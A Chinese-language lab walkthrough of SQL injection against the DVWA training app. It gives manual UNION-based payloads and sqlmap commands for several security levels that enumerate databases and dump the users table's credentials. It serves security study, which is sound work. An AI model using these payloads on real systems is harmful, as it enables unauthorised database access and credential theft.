安全級(jí)別:low
使用手工注入
目標(biāo):http://192.168.2.35/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
1' or '1' ='1
1' or 1 = 1 #
1' or 1 = 1 -- 這個(gè)--后面有個(gè)空格
上面只是測(cè)試SQL注入是否存在
手工SQL注入各種操作
爆出所有數(shù)據(jù)庫(kù)
1' and 1=2 union select 1,schema_name from information_schema.schemata --
爆出所有的表名
1' and 1=2 union select table_schema,table_name from information_schema.tables --
爆數(shù)據(jù)庫(kù)當(dāng)前在使用的數(shù)據(jù)庫(kù)名
1' and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata --
數(shù)據(jù)庫(kù)用戶信息和版本號(hào)
1' and 1=2 union select 1,concat(database(),0x3a,user(),0x3a,version()) from information_schema.schemata --
爆表
1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --
爆字段
1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
and table_schema=database() --爆出全部?jī)?nèi)容
1' and 1=2 union select 1,group_concat(user_id,0x3a,user,0x3a,password) from users --
一個(gè)一個(gè)爆
1' and 1=2 union select 1,concat(user) from users limit 0,1 --
爆出賬戶和密碼
1' and 1=2 union select concat(user),concat(password) from users limit 0,1 --
使用sqlmap注入
判斷是否存在注入
sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=low; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0"
列出所有數(shù)據(jù)庫(kù)
sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=low; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0" --dbs
直接爆出賬戶和密碼
sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=low; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0" --users --passwords
注意這里因?yàn)镈VWA是登錄狀態(tài),所以注入的時(shí)候需要帶上cookie,這里的cookie值是cookie屬性不需要帶上cookie的key和value
安全級(jí)別:medium
使用手工注入
這個(gè)中級(jí)別就是變成了POST請(qǐng),只要使用Burpsuite或者OWASP ZAP 抓包提交POST的BODY體 數(shù)據(jù)即可
在body體中提交如下數(shù)據(jù)
id=1 union select 1, version() limit 1,1 &Submit=Submit
其他跟低級(jí)別的類(lèi)似
爆出所有數(shù)據(jù)庫(kù)
id=1 union select 1,schema_name from information_schema.schemata -- &Submit=Submit
爆出所有表名
id=1 union select table_schema,table_name from information_schema.tables -- &Submit=Submit
爆出當(dāng)前在使用的數(shù)據(jù)庫(kù)名
id=1 union select 1,group_concat(schema_name) from information_schema.schemata -- &Submit=Submit
爆出用戶信息和版本號(hào)
id=1 union select 1,concat(database(),0x3a,user(),0x3a,version()) from information_schema.schemata -- &Submit=Submit
爆表
id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- &Submit=Submit
爆字段
id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database() -- &Submit=Submit
爆出全部?jī)?nèi)容
id=1 union select 1,group_concat(user_id,0x3a,user,0x3a,password) from users -- &Submit=Submit
一個(gè)一個(gè)爆
id=1 union select 1,concat(user) from users limit 0,1 &Submit=Submit
爆出賬戶和密碼
id=1 union select concat(user),concat(password) from users limit 0,1 -- &Submit=Submit
使用sqlmap注入
測(cè)試是否存在注入
sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli/#" --data "id=2&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=medium; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0"
列出所有的數(shù)據(jù)庫(kù)
sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli/#" --data "id=2&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=medium; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0" --dbs
其他操作都一樣
SQL盲注
安全級(jí)別:低
sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#" --proxy=http://127.0.0.1:8090 --cookie "security=low; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0"SQL盲注
安全級(jí)別:中
sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli_blind/#" --data="id=3&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=medium; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0"SQL盲注
安全級(jí)別:高
sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli_blind/cookie-input.php" --data="id=5&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie="security=high; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0" -p id --level=5 --risk=3免責(zé)申明:本人所撰寫(xiě)的文章,僅供學(xué)習(xí)和研究使用,請(qǐng)勿使用文中的技術(shù)或源碼用于非法用途,任何人造成的任何負(fù)面影響,或觸犯法律,與本人無(wú)關(guān)